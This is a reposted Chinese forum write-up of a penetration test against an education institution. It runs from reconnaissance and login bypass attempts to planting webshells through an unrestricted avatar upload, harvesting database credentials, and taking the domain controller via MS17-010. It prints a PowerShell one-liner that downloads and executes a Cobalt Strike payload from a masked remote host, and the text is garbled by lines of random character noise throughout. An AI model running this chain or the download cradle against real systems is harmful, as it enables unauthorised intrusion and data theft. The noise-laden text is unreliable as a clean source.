|
8 z+ H1 t, {! a/ G* a% ^
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
! j* h) @. i# K 5 c$ A2 k c0 E; b5 r' @$ T9 n: V/ |
7 y D9 d& A, L: z8 m) {0 M
0 N$ }, n$ m e* M$ _) x2 a) Q
6 L& e( y: J9 e& B
* ?1 L# y, p+ u$ Q P" X
正文4 g' h* Z- j G' P, j
7 t2 P* @* W3 H2 n' [% {1 C
1 _, H& Z$ s9 A8 @: i% {2 x4 l
: v8 P4 ^1 ?0 N6 w
5 J/ x5 a, N: G- L, K& A% K! g" X6 ^" d" b9 }+ j
目标:www.xxxx.com(一家教育机构)
9 O& f* j- {- h2 a" [/ |! {打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能& Q1 R/ }# ?5 z5 ~- B0 Y
5 S: R/ Z; E5 G3 q) w
`5 D9 I1 x0 _" T
$ w. f; e5 i9 q( }
+ O2 g0 P0 H$ K3 Q' r0 z0 O" {
+ t: B2 a, z9 g$ [ 进行了简单的信息搜集
% ^0 T1 f+ Z; U0 p& n
3 o- p3 H: h. I4 q9 q4 x
& _. z7 c4 U6 b
, `( A% B2 r' e# y% z4 }) u6 K( p) N+ `& R! P* u# W% v
子域名搜集
2 U( f7 `: T0 E8 J! K
: `5 C( V* f% T8 C; I/ l" h) e3 E3 a$ V% Z$ a5 E, ]
z" J7 H+ V5 V" g( h
0 }- R* X& p& k0 i8 f5 u9 l$ U1 D
A+ t" A5 P6 p; x% Y
fofa找资产 % m# e7 e6 n2 d8 j3 j( e+ P
9 L: i: O! N5 `, C% E/ X1 _+ A- h9 y; J$ w; G( y; _0 I: p+ |6 ]
* |6 ^* G: i1 ~. [1 r1 E; ]* U7 P
; Y8 [; J2 X9 K+ {
% y$ R9 x3 g7 ]0 d
6 i# [1 Q* g- n9 I- m
一共七个资产。去重之后只有两个。
3 e) Y& r! J" x" _% c* T, r
$ }8 H$ a% c+ X; L9 l/ J" l% @
: t P/ E c) \. S6 V2 V# C- M5 W% A
4 S! R: P4 M Z# {) K! t- j
; S; I( U# B% ^' O1 D 目录探测
- O: D; j& d* l; X ! {0 q3 a" M2 j7 I2 u" f9 F
5 K* ^9 a3 l0 K 3 O4 C* E' X2 e; X& y
6 B0 p0 }0 `: M/ W
S& R4 t3 X$ c' I
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
" S6 m9 }1 ~3 c6 t7 q# b& X0 |
5 n; L& j$ ?2 f+ o2 f8 q( f1 O) m/ N; T$ l N
4 w, s2 }* h" I( N0 g# x
# Q- _( J q- |1 A4 g3 K5 l 我又尝试了通过修改返回包来绕过登录界面
+ W9 K- K' B( O : _! L- p# c" K7 ^" I) |
) `% P7 E! j- q9 ^* J1 A. i* ?6 u , z( w0 F. ~* A X! X
. @9 y/ n2 o, o; {
( f- U5 i; H$ Z- E7 ^
还是不行,尝试注入无果, R5 G( G1 S H! ~. o; N- B
% }& t! e+ C- Q6 L) C% V2 G! B9 O! |) N2 ?4 W. w% _( ~
) w. ~. r' u, i! z
! ^* i% q3 q( w( f6 s- ]7 l! r) Y9 D5 @: x5 N. E/ v1 v
不过我目录探测出了一处Spring信息泄露
' N7 @" p9 [' u- u6 L
7 W7 d4 u* C) q. E
6 m* Y3 |% g9 K } ) o% N" P3 x& N9 H/ r
4 \+ ?5 Q! m# |, j
+ t* J3 z0 k+ {1 T1 I
. M5 |1 S- C) p# P% [! w* r% y8 ~- p: {. ]. @) ~
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
. x, G9 z' r# U 5 P6 Y& O1 o' }' U# e% Q3 g$ N
+ n. b: V" K8 |2 y8 l* I
) a9 m, w, U1 a; n- K& E: G4 Y
4 C% @- }1 }5 D
7 H! S6 ]0 o ~ 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。; C3 T# C& V) _/ o ]0 _4 m
; r. s' E2 {2 y1 ^) D
3 ?& z+ H* e2 H- w. l$ M: H. ]7 l* p
5 b1 }7 y( c! j( {5 h
3 o! \( G' S! E f, B# \: w. w
2 r$ U$ Y8 Y8 D( _( A. w* ?
获取有些师傅到这一步就手机抓包电脑测了。% l- f2 o6 K( b1 C
& q" G1 M B( e7 F' h' n. A
9 f. S# ]: J. s6 M' l& [! e Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
) C. A4 X$ e; {" F3 A! a( R r0 z8 a
. t. t% Y/ p& c% _1 \5 [+ @ k K v
其中在一个公众号发现了小程序,可以进行注册。
F2 f2 h$ O5 z1 c( p- V8 B# D
% @) p6 ^- g: N% T$ `+ G {$ M9 D3 Y
看到了头像上传,尝试上传获取WebShell
7 l0 D5 `0 u# W2 q% `- L
0 x7 a8 n6 D" ^6 M7 X& J9 G0 U# u& L
* f# [4 y E7 Q) }; G; y
. E. |6 a# d, t6 r4 `
8 ]2 U4 t! D& x, ^ 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问( V6 z8 Q7 g8 t1 N1 ]8 n6 w! A
. d3 ]+ q! w& |7 C8 J
7 v. [0 ~* v$ X/ e2 d
3 B* M/ S7 A3 P" O* P 8 D k! H$ U' V ?( V. R0 m
3 C6 V/ s7 f8 _$ }2 y2 z1 E 然后上了大马
) }* |, ^: a1 Z* U9 |" _ . A8 t! s) A* d' h2 B7 \/ G/ n
0 W" t7 V8 o/ L# ^
, L5 G' G$ x8 i$ R- W x
! i% {" a. J! f h) K
) C& u9 r3 R, i9 Y# R9 W P
/ V- Q. f" M& \+ q 2 x' ?# d; `+ H/ o
- W1 t, |9 U2 m2 C: _9 r0 C" ?' W$ z6 ~ 通过翻找文件发现数据库账号密码
8 q, v) I& J8 ~) B) J- x5 b
* [. R0 J" q; O" ^3 l# |& @( C7 a8 X; d
' B2 Z. Q6 A& j% Z
5 v3 k0 q" ^5 }1 F5 F3 c6 T9 {7 H3 R- q, R$ Z8 K. @
--内网渗透
1 p4 j) L4 d; ~7 f+ T - A! Z3 k, }( s: g& n" O9 f
3 t5 l1 w9 l9 @+ O& ?1 U# F
直接通过powershell执行 cs上线7 i/ m; r( G. ]) ]+ w, ]" E7 D
1 ^$ S! f1 m3 w& P, h4 W6 w8 Z
( ^' d4 N: u$ ` w
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"+ w V6 p. `. z7 ]2 F
6 V; ]# [. t) I- Y1 Q
3 O7 w& `+ G* K0 l" \! ? 5 h c! p( Y4 I. f/ w
- [- O/ `6 w; q6 u
& n& v3 a% S' [( F/ W1 b
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
- `# ^- m& B3 Q ) Q! Y0 Q0 A3 ]0 J
1 C; O3 W( P% ~- s0 N( R
1 K$ h- d( b9 t$ S) i6 H* k2 { ( S( P/ E$ S' g5 ~) U: g& D) Q0 W
" j+ H2 G) T* b @ 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
' y; k7 m7 @! q; |2 v2 i" k 2 z8 T0 p5 ?3 k g) S# W
+ K* W) e( q0 H
' {6 d! l0 q, d# k9 q' R
/ t/ k* C/ E9 X& n
) M0 E& g! Q5 f, ] M- L
7 u" n4 c' \+ w8 r
, C( t7 J4 j3 Y& [* }$ X4 ~! a7 Z9 H7 o8 t
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 - b+ I7 T' X- r, } E! v
1 B0 o3 d6 J. T% K" H) S# g, ?* J
9 H$ ?9 U1 _3 K4 ~$ A 2 k Y0 | Z3 z2 M
, m2 M$ f# i% H- e; r3 V! O 1 @8 T' {3 N( L/ d N8 G6 ~8 `9 F- R
7 n- P7 k6 t. y
# F, E/ L& `9 N
( {& u9 s& G0 l2 N3 J9 \. u1 j( P 5 y+ r3 y8 T& ^/ q
: k: ]( f8 s8 [1 T( x6 ]7 A $ | n5 O& B. _. }
2 d& g! n9 T3 p# Z5 f1 l
. T! Y. |0 d5 {+ A; a% G 4 k% y9 z; d* x1 e+ p2 N/ O0 }
' G4 p) }$ a1 V! O& M7 ?
小结
' `+ O$ i) ^# E2 t1 D9 R C) h 4 K- m# t; D3 U1 Y0 o( V
, ~5 v7 h, C+ @; d/ f& a. e5 p+ X3 W
+ a* ^7 T6 i' T1 N! ?1 M
; s& ?5 `' U: w$ I- X& y0 a9 o v, R7 D
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
- V* m6 \# v6 I) e7 o& b. y E" O N+ |0 k% V
, ]( {$ V, W: d% j" X ; D6 ^8 L# h% d, D
3 g+ Q B; d8 N0 S5 B$ v5 l
; }1 J3 L: G2 P5 L -
9 m: s# U; [& D' ` e: d. Z ( x Z9 @: B0 _9 v9 _/ H. M% V
) x* n3 Q7 O# L9 h* w2 y; y - 7 ^! Q- _/ Z8 S! |& G# o
. l/ d0 b; e+ q4 A" e9 G
, c$ s7 b s" e s5 b' U- k" U3 C % ` A. d; y5 ~9 f" U# H' q4 b
& X9 W6 e; z$ S, X. P7 A5 l# U
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
* Z' }% ~) X" ]( t8 c% H6 I
% e1 H' J7 R, r; r( [& U8 n4 k0 Q8 z
# X' f& C! X0 w: N: T9 ?# [1 [
|